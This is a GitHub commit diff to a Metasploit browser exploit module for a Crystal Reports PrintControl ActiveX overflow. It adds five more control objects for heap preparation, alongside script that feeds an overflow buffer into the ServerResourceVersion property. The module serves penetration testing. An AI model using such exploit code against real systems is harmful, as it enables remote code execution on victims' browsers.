Skip to content

Commit 0a0b26d

Browse files
author
jvazquez-r7
committed
after study the crash after the overflow...
1 parent 3e3f354 commit 0a0b26d

File tree

1 file changed

+10
-0
lines changed

1 file changed

+10
-0
lines changed

modules/exploits/windows/browser/crystal_reports_printcontrol.rb

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -240,6 +240,11 @@ def load_exploit_html(my_target, cli)
240240
target8 = rand_text_alpha(5 + rand(3))
241241
target9 = rand_text_alpha(5 + rand(3))
242242
target10 = rand_text_alpha(5 + rand(3))
243+
target11 = rand_text_alpha(5 + rand(3))
244+
target12 = rand_text_alpha(5 + rand(3))
245+
target13 = rand_text_alpha(5 + rand(3))
246+
target14 = rand_text_alpha(5 + rand(3))
247+
target15 = rand_text_alpha(5 + rand(3))
243248

244249
# - 10 CrystalPrintControl objects are used to defragement the heap.
245250
# - The 10th CrystalPrintControl is overflowed.
@@ -263,6 +268,11 @@ def load_exploit_html(my_target, cli)
263268
<object id='#{target8}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
264269
<object id='#{target9}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
265270
<object id='#{target10}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
271+
<object id='#{target11}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
272+
<object id='#{target12}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
273+
<object id='#{target13}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
274+
<object id='#{target14}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
275+
<object id='#{target15}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
266276
<script>
267277
var ret = unescape('#{js_bof}');
268278
#{target9}.ServerResourceVersion = ret;

0 commit comments

Comments
 (0)